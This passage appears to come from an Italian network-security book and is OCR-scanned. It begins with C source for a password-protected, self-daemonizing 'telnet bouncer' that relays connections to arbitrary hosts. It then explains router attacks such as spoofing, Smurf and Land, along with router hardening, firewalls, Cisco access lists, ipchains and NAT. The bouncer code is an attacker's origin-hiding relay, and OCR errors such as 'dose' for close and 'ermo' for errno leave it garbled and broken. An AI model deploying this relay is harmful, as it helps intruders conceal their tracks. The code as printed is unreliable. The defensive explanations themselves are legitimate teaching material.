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/* "Telnet to address/port . Hit Ix [ENTER] , password, "*/ 
/*"Host and port 23 for connection. "*/ 

char sbuf [2048], cbuf[2048]; 

extern int ermo; 

extern char *sys_errlist [ ] ; 

void reaper () ; 

int main () ; 

void telcli () ; 

int main (argc, argv) 
int argc; 
char *argv[] ; 
{ 

int srv_fd, rem_fd, rem_len, opt = 1; 
struct sockaddr_in rem_addr, srv_addr; 
bzero ( (char *) &rem_addr, sizeof (rem_addr) ) ; 
bzero((char *) &srv_addr, sizeof (srv_addr) ) ; 
srv_addr . sin_family = AF_INET; 
srv_addr. sin_addr. s_addr = htonl (INADDR_ANY) ; 
srv_addr.sin _port = htons (SERV_TCP_PORT) ; 
srv_fd = socket (PF_INET, SOCK_ S TREAM, 0) ; 

if (bind(srv_fd, (struct sockaddr *) &srv_addr, sizeof (s rv_addr) ) 
== -1) { 

perror ( "bind" ) ; 
exit (-1) ; 

} 

listen (srv_fd, QLEN) ; 
close(O); close(l); dose (2); 
iifdef TIOCNOTTY 

if ((rem_fd = open ("/dev/tty", 0_RDWR) ) >= 0) { 

ioctl (rem_fd, TIOCNOTTY, (char *)0); 

dose (rem_fd) ; 

} 

#endif 

if (fork()) exit(O); 
while (1) { 

rem_len = sizeof (rem_addr) ; 

rem_fd=accept (srv_fd, (struct sockaddr *) &rem_addr, 
&rem_len) ; 

if (rem_fd < 0) { 

if (ermo == EINTR) continue; 
exit (-1) ; 

} 

switch(fork() ) { 
case 0 : 

dose (srv_fd) ; 

telcli (rem_fd) ; 

dose (rem_fd) ; 

exit (0) ; 

break; 
default : 

dose (rem_fd) ; 

if (fork()) exit(O); 

break; 
case -1 : 

fprintf (stderr, " \n\rfork: %s\n\r", sys_errlist [ermo] ) ; 
break; 

} 

} 

} 
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void telcli (source) 

int source; 

{ 

int dest ; 
int found; 

struct sockaddr_in sa; 
struct hostent *hp; 
struct servent *sp; 
char gethost [100] ; 
char getport [100] ; 
char string [100] ; 

bzero (gethost, 100); 
read(source, gethost, 100); 
sprint f (string, "") ; 

write (source, string, strlen (string) ) ; 
read(source, gethost, 100); 

gethost [ (strlen (gethost) -2) ] = ' \0 ' ; /* kludge alert - kill the 
\r\n */ 

if (strcmp (gethost, MY_PASS) 1=0) { 
dose (source) ; 
exit (0) ; 

} 

do { 

found = 0; 

bzero (gethost , 100) ; 
sprint f (string, "telnet bouncer ready. \n") ; 
write (source, string, strlen (string) ) ; 
sprint f (string, "Host: "); 
write (source, string, strlen (string) ) ; 
readfsource, gethost, 100); 
gethost [ (strlen (gethost) -2) ] = ' \ 0 ' ; 
hp = gethostbyname (gethost) ; 
if (hp) { 

found++; 

#if !defined(h_addr) /* In 4.3, this is a idefine */ 

#if defined(hpux) Il defined(NeXT) Il defined(ultrix) Il 
defined (POSIX) 

memcpy ( (caddr_t) Ssa. sin_addr, hp->h_addr_list [0] , hp- 

>h_length) ; 
#else 

bcopy (hp->h_addr_list [0] , Ssa . sin_addr, hp->h_length) ; 

#endif 

#else /* defined (h_addr) */ 

#if defined (hpux) Il defined (NeXT) Il defined (ultrix) Il 
defined (POSIX) 

memcpy ( (caddr_t) Ssa . sin_addr, hp->h_addr, hp->h_length) ; 

#else 

bcopy (hp->h_addr , Ssa . sin_addr, hp->h_length) ; 

#endif 

#endif /* defined (h_addr) */ 

sprint f (string, "Found address for %s\n", hp->h_name) ; 
write (source, string, strlen (string) ) ; 
} else { 

if (inet_addr (gethost) == -1) { 
found = 0; 

sprint f (string, "Didnt find address for %s\n", 

gethost) ; 

write (source, string, strlen (string) ) ; 
} else { 

found++; 
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sa . s±n_addr . s_addr = inet_addr (gethost) ; 

} 

} 

} while (Ifound); 

sa. s±n_family = AF_INET; 

sprint f(st ring, "Port: "); 

write (source, string, strlen (string) ) ; 

read(source, getport, 100); 

gethost [ (strlen (getport ) -2) ] = ' \ 0 ' ; 

sa. sin _port = htons ( (unsigned) atoi (getport) ) ; 

if (sa. sin _port == 0) { 

sp = getservbyname (getport, "tcp") ; 

±f (sp) 

sa.sin_port = sp->s _port; 

else { 

sprint f (string, "%s: bad port number\n", getport); 

write (source, string, strlen (string) ) ; 

return; 

} 

} 

sprint f (string, "Trying %s...\n", (char *) 
inet_ntoa (sa . sin_addr) ) ; 

write (source, string, strlen (string) ) ; 
if ( (dest = SOCket (AF_INET, SOCK_ STREAM, 0) ) < 0) { 
perror ( "telcli : socket ") ; 
exit (1) ; 

} 

connect (dest, (struct sockaddr *) Ssa, sizeof (sa) ) ; 

sprint f (string, "Connected to %s port %d. . . \n", 
inet_ntoa (sa . sin_addr) , ntohs (sa . sin__port) ) ; 

write (source, string, strlen (string) ) ; 
#ifdef FNDELAY 

fcntl (source, F_SETFL, fcntl (source, F_GETFL, 0) I FNDELAY) ; 

fcntl ( dest , F_SETFL, fcntl (dest, F_GETFL, 0) I FNDELAY) ; 
#else 

fcntl (source, F_SETFL, 0_NDELAY) ; 
fcntl ( dest , F_SETFL, 0_NDELAY) ; 
#endif 

communicate (dest, source) ; 
dose (dest) ; 
exit (0) ; 

} 

communicate (sfd, cfd) { 

char *chead, *ctail, *shead, *stail; 
int num, nfd, spos, epos; 
extern int ermo; 
fd_set rd, wr; 

chead = ctail = ebuf; 
epos = 0; 

shead = stail = sbuf; 
spos = 0; 
while (1) { 

FD_ZERO (&rd) ; 

FD_ZERO (Swr) ; 

if (spos < sizeof (sbuf ) -1) FD_SET (sfd, &rd) ; 

if (ctail > chead) FD_SET (sfd, &wr) ; 

if (epos < sizeof (ebuf) -1) FD_SET (cfd, &rd) ; 

if (stail > shead) FD_SET (cfd, &wr) ; 

nfd = select (256, &rd, Swr, 0, 0) ; 

if (nfd <= 0) continue; 
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if (FD_ISSET (sfd, &rd)) { 

num=read (sfd, stali, sizeof (sbuf) -spos) ; 

if ((num==-l) && (ermo .'= EWOULDBLOCK) ) return; 

if (num==0) return; 

if (num>0) { 

spos += num; 

stail += num; 

if (! — nfd) continue; 

ì 

ì 

if (FD_ISSET(cfd, &rd) ) { 

num=read (cfd, ctail, sizeof (cbuf) -epos) ; 

if ((num==-l) && (ermo != EWOULDBLOCK)) return; 

if (num==0) return; 

if (num>0) { 

epos += num; 

ctail += num; 

if (! — nfd) continue; 

} 

) 

if (FD_ISSET (sfd, &wr) ) { 

num=write (sfd, chead, ctail -chead) ; 

if ((num==-l) && (ermo .'= EWOULDBLOCK) ) return; 
if (num>0) { 

chead += num; 

if (chead == ctail) { 

chead = ctail = cbuf; 
epos = 0; 

} 

if (! — nfd) continue; 

} 

) 

if (FD_ISSET (cfd, &wr) ) { 

num=write (cfd, shead, stail -shead) ; 

if ((num==-l) && (ermo != EWOULDBLOCK)) return; 
if (num>0) { 

shead += num; 

if (shead == stail) { 

shead = stail = sbuf; 
spos = 0; 

} 

if (! — nfd) continue; 

) 

) 




I routers 



Quella che noi siamo abituati a definire con il termine di rete è di fatto un insieme di strati su 
ciascuno dei quali determinati protocolli svolgono le funzioni necessarie per il corretto 
funzionamento di tutti i servizi che siamo abituati ad utilizzare come ad esempio quelli di 
navigazione, della posta elettronica e così via. 

Indipendentemente dal tipo di questi, una cosa che è necessario comprendere è che le 
informazioni trasmesse vengono spedite a blocchi all'interno di quelli che vengono definiti 
come pacchetti i quali partono da un sistema d'origine e passando attraverso un certo 
numero di altri raggiungono la destinazione sulla quale vengono ricomposti e utilizzati per lo 
scopo per cui sono stati originati. 
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Questa definizione porta a comprendere che di fatto i pacchetti seguono un percorso, per cui 
all'interno del sistema di rete deve necessariamente esistere un meccanismo che permette di 
gestire quello chiamato con il termine di instradamento o routing. 

I meccanismi presenti ai livelli più bassi sono quelli che regolano il funzionamento legato al 
trasferimento delle informazioni indipendentemente dalla tipologia di servizio a cui queste 
sono relative. 

Normalmente siamo abituati a riferirci al protocollo TCP/IP che di fatto è una suite di diversi 
altri, tra cui IP il quale è quello che si interessa di instradare i pacchetti di dati. 

I routers di fatto sono i meccanismi hardware che si interessano di gestire le strade 
telematiche che i pacchetti seguono per passare da un sistema mittente ad uno di 
destinazione. 

Questi prendono la decisione di dove inviare i pacchetti, analizzando la loro testata 
contenente le informazioni e valutando le tabelle di instradamento gestite dai routers stessi. 
Mentre fino ad un po' di tempo fa gli hackers prendevano di mira i WEB servers ora hanno 
spostato la mira verso i routers e quello definito con il termine di BGP (Border Gateway 
Protocol) il quale si interessa di traslare le tabelle di routing tra i vari sistemi venduti da 
diverse società. 

II CERT (Computer Emergency Response Team) ha recentemente rilasciato un documento 
dove veniva mostrato come sta diventando sempre maggiore l'interesse degli hackers nei 
confronti di questo dispositivo. 

Compromettere il funzionamento di uno di questi sistemi significa in pratica coinvolgere una 
serie di meccanismi il cui scorretto funzionamento potrebbe causare problemi di sicurezza o 
anche solo di prestazioni della rete stessa. 

Già normalmente, senza parlare di cattivi funzionamenti, la corretta programmazione di un 
router porta a migliorare notevolmente le prestazioni nell'ambito dei trasferimenti dei 
pacchetti. 




Quando si utilizza uno di questi la lettura e la comprensione dei documenti forniti insieme è il 
primo passo per una corretta configurazione e quindi di conseguenza la limitazione delle 
probabilità che questi siano causa di certi problemi. 

Alcune volte gli hacker possiedono effettivamente la capacità di teorizzare e successivamente 
di realizzare degli attacchi ma nella maggior parte dei casi gli accessi indesiderati o 
comunque le manomissioni dei sistemi informatici avvengono a causa della presenza di bugs 
nell'ambito dei sistemi operativi, dei servers e dei sistemi hardware che li gestiscono. 
Avere l'accortezza di seguire giorno dopo giorno le informazioni rilasciate dalle case 
costruttrici e il fatto d'installare prontamente le hotfix e le patchs significa evitare un 
grossissima percentuale di problemi di questo tipo. 

Spesso quando si acquistano linee dedicate da società come Interbusiness, del gruppo 
Telecom, i routers vengono forniti da queste e la loro programmazione diventa impossibile in 
quanto l'accesso alle funzioni di configurazione non sono consentite se non ai centri di 
gestione della società stessa. 
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Nell'ambito dei routers si possono avere un certo numero di tipologie differenti di attacchi in 
particolar modo quelli a basso livello che vengono eseguiti alterando i contenuti dei pacchetti. 
Essendo il settaggio del router vincolato ad una password il primo dei problemi di sicurezza è 
senz'altro quello legato all'individuazione di questa. 

Altri tipi di attacchi sono quelli legati alle manomissioni relative alle informazioni usate per I 
instradamento eseguito dai protocolli, a quelli legati al protocollo SNMP, agli attacchi RIP, a 
quelli in cui si usa la frammentazione dei pacchetti, alla redirezione per giungere alla 
redirezione circolare nel caso di quegli attacchi definiti con il termine di denial of service. 
Spesso questi non hanno come scopo quello di impossessarsi delle risorse ma 
semplicemente di metterle fuori uso. 

Indipendentemente dall'obbiettivo che si pongono i metodi usati, i mezzi per eseguirli 
possono variare anche se di fatto la tecnica fondamentale è comunque sempre legata alla 
manipolazione delle informazioni contenute all'interno delle testate dei pacchetti. 
Abbiamo detto prima che l'instradamento viene eseguita da parte del router analizzando le 
informazioni contenute dentro agli headers dei pacchetti. 

Questa che segue è una testata relativa ad un pacchetto gestito dal protocollo IP e come 
potrete notare al suo interno sono presenti l'indirizzo di partenza e quello di destinazione. 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Versioni IHL IType of Service I Total Length / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Identification /Flagsl Fragment Offset \ 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Time to Live j Protocol / Header Checksum j 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Source Address j 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Destination Address / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I TCP header, then your data 



Uno degli attacchi perpetuati con la tecnica del mascheramento viene eseguito falsificando gli 
indirizzi contenuti dentro ai pacchetti IP spediti dal di fuori del network ma con valori che 
porterebbero a credere che questi di fatto provengano dal di dentro di questo. 
Questo tipo di attacco viene utilizzato per ottenere l'accesso a certe risorse o per introdurre 
nella rete dei dati alterati. 

Il metodo, nel caso in cui non si voglia solo creare problemi funzionali, non è poi cosi 
semplice in quanto la tecnica, oltre alla manipolazione dei dati dentro al pacchetto, deve 
possedere una metodologia che permette di individuare un numero di sequenza che il 
sistema utilizza per verificare la correttezza dei pacchetti trasmessi. 
Alcune volte gli attacchi vengono eseguiti registrando le sequenze di pacchetti o di comandi 
delle applicazioni. 

Dopo aver eseguito la registrazione e manipolato le informazioni, queste vengono 
ritrasmesse simulando il comportamento dei meccanismi originali. 

Un tipo di attacco eseguito nei confronti dei routers, uno dei più recenti nell'ambito di quelli a 
basso livello, è quello definito con il nome di Smurf. 

In pratica l'attaccante invia verso il router un grosso numero di PING (funzioni Echo del 
protocollo ICMP) verso un indirizzo di broadcast usando come indirizzo del mittente uno falso. 
Il router invia questo pacchetto all'indirizzo di broadcast raggiungendo potenzialmente in una 
rete /24 fino a 255 sistemi. 

La riuscita dipende chiaramente da come sono configurati gli hosts i quali nella peggiore delle 
ipotesi cercano di rispondere al falso indirizzo riuscendo a generare in una rete con 200 hosts 
un traffico di circa 80 Mbps. 

In questo modo l'attaccante riesce a creare un amplificazione dei pacchetti inviati arrivando 
ad occupare una quantità molto grossa di banda a disposizione della vittima. 
Come vedremo successivamente la protezione in questo caso consiste nel disabilitare un 
servizio del router e precisamente quello definito con il termine di IP directed broadcasts. 
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La falsificazione degli indirizzi dentro alla struttura che abbiamo visto precedentemente è alla 
base di un grosso numero di attacchi. 

I metodi di protezione 

L'argomento è complesso anche alla luce del fatto che le configurazioni di rete possono 
essere moltissime e quindi anche i metodi adottati per la sicurezza devono essere escogitati 
in funzione di ciascuna di queste. 

Questi coinvolgono diversi livelli a partire da quello che è il livello fisico. 

Uno dei punti cruciali è la memoria in quanto alcuni tipi di attacchi del tipo definito con il 

termine di denial of service tendono a fare esaurire le risorse a disposizione. 

Un router di fatto può essere paragonato a molti computer sui quali sono mantenuti in 

funzione alcuni servizi molti dei quali non sono necessari e addirittura possono essere 

utilizzati dagli hackers per ottenere certi tipi di informazioni. 

Questi servizi possono essere abilitati o disabilitati a seconda delle prestazioni e delle 
funzioni che si desiderano avere dal router. 

I servizi sono del tipo del finger, dell' IP source routing, IP redirect ecc. 
Per sapere come sono questi di default è necessario consultare il manuale fornito dal 
costruttore oppure è possibile interrogare il sistema con le apposite Utilities fornite con questo 
oppure acquistati a parte come ad esempio Solarwinds. 

Una delle cose scontate sono relative al fatto che le funzioni di settaggio dei routers in genere 
sono accessibili tramite dei login che vengono fatti sul dispositivo a seguito dell'inserimento di 
una password. 

Questa deve essere sufficientemente lunga e complessa per fare in modo che non possa 
essere facilmente individuata. 

Un'altra cosa relativa alle password che è necessario ricordarsi è che spesso questi sistemi 
possiedono delle password di default per cui prima di attivarli in rete è necessario cambiarle 
senza contare che in passato alcuni routers possedevano delle backdoor fornite dai 
costruttori per aiutare le società che si dimenticavano la password a reinserirsi nel sistema. 
In alcuni casi sono stati segnalati dei problemi legati all'overflow dei buffers legati alle 
passwords come nel caso dei routers Cisco della serie 7xx. 

In questi casi è necessario fare quello che abbiamo detto inizialmente ovvero informarsi sui 
siti dei costruttori per vedere se esistono delle patchs per questi problemi. 
In ogni caso un router può essere utilizzato per rafforzare la sicurezza nell'ambito di una rete. 
In genere questa deve sempre essere curata mediante un sistema indispensabile per questi 
scopi e precisamente il firewall anche se di fatto i routers possono essere settati per 
funzionare come tali. 

Questi sono sistemi software o hardware che analizzano i pacchetti ad uno ad uno e che 
sono capaci di identificare l'origine e la destinazione e quindi di applicare determinate regole 
che ne permettono o ne negano il passaggio sulla rete. 

I firewall possono essere creati mediante funzioni implementate dentro ai sistemi operativi, 
come ad esempio la funzione ipchains interna al kernel di Linux, oppure possono essere 
sistemi hardware dotati di certi tipi di algoritmi come ad esempio quelli di tipo adattivo presenti 
nei firewalls Cisco PIX. 

Un metodo di protezione, conosciuto con il termine di screening router, crea una linea 
statica di routing usata per passare al firewall tutte le connessioni relative al network protetto. 
Un altro meccanismo utilizza due routers e precisamente uno tra il mondo internet e il firewall 
ed un altro tra questo e la rete protetta. 

Normalmente alcuni tipi di firewall hardware permettono di creare, grazie alla presenza di 
molte interfacce, diverse zone a differenti livelli di protezione definite con il termine di DMZ 
(de-militarized zone). 

I tentativi di attacchi in ogni caso possono essere anche identificati dall'analisi dei files di log. 

I routers implementano quasi sempre funzioni di filtraggio quindi se si riesce ad identificare gli 
indirizzi d'origine di certi pacchetti è possibile negare il passaggio di questi. 

II filtraggio dovrebbe comunque anche essere effettuato bloccando tutti quei protocolli che 
non sono strettamente necessari agli hosts presenti sul network. 

Inoltre alcune regole permettono di limitare i danni legati a funzioni di spoofing come ad 
esempio il fatto di non permettere il passaggio di nessun pacchetto in ingresso che contenga 
IP relativi ad sistemi interni al network e allo stesso tempo non permettere l'uscita di 
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pacchetti che non siano segnati con IP valido relativo ad un sistema presente all'interno della 
rete. 

Alcuni routers della Cisco contengono già sistemi di protezione per questo genere di 
problemi. 

Un altro tipo di blocco può essere settato per fermare tutti i pacchetti che provenendo 
dall'esterno contengono soltanto il SYN flag settato. 

Un altro sistema minimo di protezione è quello di settare il tutto perché all'interno della cache 

ARP sui vari hosts ci siano tutti gli indirizzi hardware di tutti i routers legittimi. 

Volendo quindi riassumere i metodi da usare per la protezione dei routers dobbiamo 

considerare per prima cosa il sistema di protezione con password del router. 

Un altro metodo per aumentare la sicurezza è quello legato alla limitazione degli accessi 

remoti. 

Infatti i routers, come ad esempio quelli della Cisco, possono essere gestiti in modo remoto 
tramite Telnet. 

E' una buona idea quella di limitare o addirittura eliminare la possibilità di eseguire questo tipo 
di gestione. 

Chiaramente se i routers sono fisicamente piazzati in zone a rischio diventa anche necessario 
eseguire la limitazione degli accessi locali. 

Essendo qualsiasi tipo di accesso una violazione delle leggi potrebbe essere utile la 
visualizzazione di banners con avvertimenti relativi a queste. 

Molte funzioni di configurazione e molti programmi di analisi dei routers utilizzano il protocollo 
SNMP, come ad esempio l'analizzatore di banda MGRT. 

La corretta configurazione del protocollo SNMP è uno degli steps essenziali, sempre nel caso 
in cui questo sia necessario e che quindi non possa essere disabilitato. 
Come abbiamo detto prima la configurazione delle funzioni di log possono servire ad 
individuare i tentativi di violazione. 

Molti tipi di attacchi vengono eseguiti specificando i percorsi che i pacchetti devono seguire. 
Settando altri meccanismi di protezione è possibile disabilitare alcune funzioni come ad 
esempio quello già visto definito con il termine di IP route source e il tipo di messaggi ICMP 
permessi. 

Infatti molti tipi di attacchi DoS usano questo protocollo. 
Sempre tra i servizi che è meglio disabilitare troviamo udp-small-servers, tcp- 
small.servers, finger, ip bootp server e nel caso di routers Cisco anche il protocollo CDP. 
In quello chiamato Land Attack l'attaccante setta la stessa porta sia come origine che come 
destinazione e fa la stessa cosa anche con l'indirizzo. 

In questo caso l'eliminazione del problema causato viene eseguita installando un patch del 
software del router. 

Alcuni routers possono inoltre disporre dei livelli di protezione aggiuntivi nei confronti degli 
hosts collegati a questi. 



I firewalls 

Nei capitoli relativi alla descrizione dei pacchetti usati dai vari protocolli per la gestione delle 
trasmissione di rete abbiamo visto come questi in genere dispongono di una testata in cui 
vengono mantenute determinate informazioni come ad esempio l'indirizzo di partenza e di 
destinazione del pacchetto. 

Nell'ambito della sicurezza di rete i firewalls sono sistemi hardware o software in grado di 
valutare questi indirizzi e di confrontarli con liste di regole che ne permettono o ne limitano il 
passaggio. 

Le aggressioni informatiche si rivelano ogni giorno più' sofisticate. La sicurezza di una rete 
aziendale costituisce una questione abbastanza complessa per tutti. 

Sono molti coloro che hanno avuto a che fare, chi prima chi dopo, con un hacker, anche se 
non tutti lo hanno reso noto, per ovvie ragioni di riserbo. Il punto è che basta un solo 
computer "debole", non sufficientemente protetto, per mettere a rischio la sicurezza dell'intera 
rete. 

Detto in altre parole un firewall è un sistema che impedisce l'accesso alla vostra rete da parte 
del mondo esterno. 

Generalmente un firewall è costituito da un dispositivo come ad esempio un router, un 
computer stand-alone oppure un software proxy. 

I Firewall sono dei dispositivi che inseriscono una barriera tra la propria azienda e Internet. 
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Barriera che dovrà garantire il libero accesso alle informazioni pubbliche e bloccare ogni 
accesso non autorizzato. 

Ovviamente queste barriere sono bidirezionali, per cui un firewall potrà essere utilizzato 
anche per gestire l'uso di Internet da parte degli utenti della propria rete. 
Molte volte i firewalls sono implementati grazie a caratteristiche che sono presenti nel cuore 
di alcuni sistemi operativi come ad esempio nel caso di Linux. 

Linux originariamente era nato proprio per la gestione di sistemi di rete in quanto al suo 
interno disponeva di caratteristiche software che lo rendevano particolarmente idoneo a 
quest'uso anche grazie alla presenza di un sistema che permetteva la creazione di firewalls 
atti a regolare il flusso di dati tra un interfaccia di rete e una seconda. 

Esistono anche versioni hardware come ad esempio quelli che utilizziamo qui in 
WEBSITEK.COM e precisamente i Cisco PIX 515 i quali dispongono al loro interno di 
software utilizzanti algoritmi adattivi i quali studiano il comportamento 'normale' dei pacchetti 
legati ad una specifica rete. 

Linux, come abbiamo appena detto, dispone a livello di kernel di funzioni che permettono la 
creazione di regole di passaggio dei pacchetti. 

Abbiamo detto che i firewall sono in grado di filtrare i dati che passano sulla rete. 

Spesso dall'esterno, quando si eseguono degli scanning di rete mediante funzioni di ping atte 

ad identificare se esiste su un determinato indirizzo un host, i sistemi protetti da firewall non 

rispondono per cui risultano trasparenti alle funzioni atte alla loro individuazione. 

Quando il ping viene indirizzato su un sistema protetto di firewall di fatto non è che questo 

non restituisca nulla ma il pacchetto inviato indietro non possiede l'indirizzo che voi state 

cercando di è pingare ma è quello del router. 

In questo modo aspettandovi un pacchetto con un determinato IP ma di fatto arrivandovi un 
altro con IP differente è come se voi non lo notaste. 

Per identificare questo tipo di comportamento, ovvero quando vi arriva un pacchetto che non 
possiede come mittente quello che vi aspettavate, esiste una modifica del software di PING 
utilizzabile su sistemi operativi UNIX. 
Il software di PING a cui mi riferisco è prelevabile da : 



all'interno del file netkit-base-0.10.tar.gz. 
La patch è invece presente all'indirizzo : 



Copiate tutti i files dentro alla stessa directory e digitate : 
patch < ping.linux.patch 
Successivamente per compilare ping 
gcc -o ping ping.c 

La parte relativa alla patch è la seguente : 

— ping.c Tue May 19 11:16:151 998 

+++ newping.c Tue Nov 24 09:42:39 1998 

@@ -180,6+1 80,7 @@ 

char DOT = 

static char *hostname; 

static int ident; /* process id to identify our packets */ 
+static struct in_addr dest_addr_store; 

/* counters 7 

static long npackets; /* max packets to transmit 7 
@@ -393,6 +394,8 @@ 
hostname = hnamebuf; 

} 
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+ dest_addr_store = to->sin_addr; 
+ 

if (options & FFLOOD && options & FJNTERVAL) { 
(void)fprintf(stderr, 

"ping: -f and -i incompatible optionsAn"); 
@@ -716,6 +719,14 @@ 
if (options & F QUIET) 
return; 

+ /* Check reply is from pinged host 7 

+ if (memcmp(&dest_addr_store, &ip->saddr, sizeof(struct in_addr))) { 

+ printf("Reply not from target. Source %s",inet_ntoa(*(struct in_addr *)&from- 

>sin_addr.s_addr)); 

+ (void)printf(" ttl=%d", ip->ip_ttl); 

+ if (timing) 

+ (void)printf(" time=%ld.%ld ms", triptime/1 0, triptime%1 0); 

+ } 
+ else 

if (options & F FLOOD) 

(void)write(STDOUT_FILENO, &BSPACE, 1); 

else { 



Esistono essenzialmente due tipologie di firewall che rispetto ai livelli di rete visti quando si 
parlava di protocolli agiscono appunto a : 




Quelli che funzionano sul primo livello agiscono mediante l'analisi degli indirizzi di partenza e 
di destinazione mediante la fatidica osservazione degli header dei pacchetti stessi. 
Spesso queste funzionalità di filtraggio vengono eseguite dagli stessi routers i quali possono 
avere gestite al loro interno delle liste di regole. 

Routers come il Cisco possiedono al loro interno una specie di loro sistema operativo come 
ad esempio I' IOS v. 10.3. 

L'esempio che segue è relativo ali gestione di una di quelle definite con il termine di access 
list. 

no ip source-route 
! 

interface ethernet 0 
ip address 195.55.55.1 
! 

interface serial 0 

ip access-group 101 in 

! 

access-list 101 deny ip 195.55.55.0 0.0.0.255 
access-list 1 01 permit tcp any any established 
! 

access-list 1 01 permit tcp any host 1 95.55.55.1 0 eq smtp 
access-list 1 01 permit tcp any host 1 95.55.55.1 0 eq dns 
access-list 1 01 permit udp any host 1 92.55.55.1 0 eq dns 
! 

access-list 1 01 deny tcp any any range 6000 6003 
access-list 1 01 deny tcp any any range 2000 2003 
access-list 1 01 deny tcp any any eq 2049 
access-list 1 01 deny udp any any eq 2049 
! 

access-list 1 01 permit tcp any 20 any gt 1 024 
! 
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access-list 101 permit icmp any any 



snmp-server community FOOBAR RO 2 
line vty 0 4 
access-class 2 in 



Sotto Linux il sistema per la gestione dei firewalls è stato modificato nelle ultime versione. 
Nelle prime versioni la loro gestione avveniva tramite ipfwadm. 
Un esempio è quello che segue: 

ipfwadm -F -f 
ipfwadm -F -p deny 

ipfwadm -F-i m -b -P tcp -S 0.0.0.0/0 1024:65535 -D 201 .123.102.33 25 
ipfwadm -F -i m -b -P tcp -S 0.0.0.0/0 1024:65535 -D 201 .123.102.33 53 
ipfwadm -F -i m -b -P udp -S 0.0.0.0/0 1024:65535 -D 201 .123.102.33 53 
ipfwadm -F -a m -S 1 92.1 68.1 .0/24 -D 0.0.0.0/0 -W ethO 



/sbin/route add -host 201 .1 23.1 02.33 gw 1 92.1 68.1 .2 



Linux nelle ultime versioni, quelle che adottano il Kernel superiore alla versione 2.2, utilizza 
ipchains per la gestione delle funzioni di firewall. 
Ad esempio : 

ipchains -A input -i $INTERNAL_EXTERNAL -s $CLASS_A -j DENY -I 
ipchains -A input -i $INTERNAL_EXTERNAL -s $CLASS_B -j REJECT -I 
ipchains -A input -i $INTERNAL_EXTERNAL -s $CLASS_C -j ACCEPT -I 

Esistono alcuni firewall hardware I quali dispongono di diverse interfacce mediante le quali è 
possibile creare diversi livelli di sicurezza nell'ambito di una rete. 
Il CISCO PIX 515 permette di installarci sopra fino a 6 schede. 

All'interno di questo tipo di firewall il livello di sicurezza da applicare è da securityO a 
sucurity100. 

Quando si gestiscono sistemi di rete con un certo numero di funzioni usare un singolo livello 
di sicurezza potrebbe essere troppo riduttivo da una parte ed eccessivamente dall'altra. 
Ad esempio qui in WEBSITEK.COM disponiamo di diversi servers sui quali vengono 
mantenute le funzionalità di WEB, di mail server, di server particolari come BizTalk e cosi via. 
Tutti questi servers sfociano sulla rete come lo fa anche la nostra rete intranet interna. 
Applicare un livello di security100 ai WEB servers sarebbe eccessivo in quanto il loro 
funzionamento è molto più indicato a livelli come ad esempio security50. 
Il contrario invece è per quello che riguarda la nostra intranet interna la quale è meglio che 
funzioni a security100. 

Grazie diverse interfacce sui firewall Cisco PIX ogni zona in WEBSITEK.COM funziona 
protetta da un certo livello di sicurezza adatto alla funzionalità che girano al suo interno. 
Il secondo livello a cui possono funzionare i firewall è quello relativo al livello applicativo. 
Fanno parte di questi i PROXY SERVER i quali funzionano generalmente da intermediari tra 
internet e la parte di rete protetta. 

Molti proxy implementano funzioni di monitoraggio e altre che permettono l'autenticazione 
degli utenti nell'ambito di un rete. 

I livelli software all'interno delle funzioni di firewall spesso implementano quelle che vengono 
definite con il termine di NAT ovvero Network Address Translation. 

Che cosa serve questa funzione ? 

Partiamo dal concetto che per essere visti su internet si deve possedere un IP definito come 
pubblico. 

La mia società ad esempio possiede, attribuiti dall'ente internet che si interessa di questo, 
128 IP pubblici. 

Qualsiasi sistema interno per poter uscire sulla rete deve possedere uno di questi IP. 

II problema è che spesso le reti intranet possiedono IP definiti tra quelli stabiliti come indirizzi 
intranet privati per cui non visibili all' esterno. 

Per poter uscire su internet l'IP di intranet deve essere traslato in un IP pubblico. 
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Nel nostro caso sono i firewall hardware CISCO che eseguono questa funzionalità ma di fatto 
questo tipo di mascheramento può essere eseguito anche da sistemi firewall software come 
quelli sotto Linux gestiti con IPCHAINS. 
Sotto Linux ad esempio è anche possibile utilizzare : 



ipnatadm -I -i 


-W 


ethO 


-S 


1.1.1.1/32 -M 55.55. 


. 55 . 55/32 


ipnatadm -0 -i 


-W 


ethO 


-D 


55.55.55.55/32 -N 1. 


.1.1. 1/32 


ipnatadm -I -i 


-W 


ethl 


-D 


1.1.1.1/32 -N 55.55. 


.55.55/32 


ipnatadm -0 -i 


-W 


ethl 


-S 


55.55.55.55/32 —M 1. 


.1.1. 1/32 


route add -net 


55. 


55.55 


.0 


netmask 255 .255 .255 . 





I firewall permettono di creare tabelle di conversione statiche e dinamiche. 

Nel primo caso un indirizzo di intranet verrà sempre traslato in un certo altro indirizzo, sempre 
lo stesso. 

II NAT dinamico invece permette di stabilire all'istante quale IP deve essere assegnato ad un 
certo IP di intranet. 

Nel caso di alcuni firewall hardware la cui velocità di analisi dei pacchetti è veramente 
notevole esiste la possibilità che questi proteggano anche da altre tecniche utilizzate dagli 
hacker per portare avanti degli attacchi ai sistemi. 

Firewall hardware come i PIX permettono di gestire centinaia di miglia di connessioni 
contemporanee e allo stesso tempo analizzare quantità di pacchetti impressionanti. 
Negli ultimi due anni è comparso sul mercato un ennesimo prodotto della Microsoft chiamato 
ISA Server. 

In pratica è il vecchio Microsoft Proxy modificato con all'interno anche funzioni di firewall di 
accelleratore. 

Spesso si è portati a pensare che il firewall sia la cura definitiva al problema della sicurezza. 
Di fatto questo non è vero e di fatti e buona regola non basare tutta la sicurezza della propria 
rete solo su questo. 

Chiaramente la scelta di un buon firewall vuole dire molto anche se spesso come tutte le cose 
la quantità di sicurezza che il firewall è in grado di dare è proporzionale al grado di 
sconoscenza che uno ha nei confronti di quello che ha scelto. 

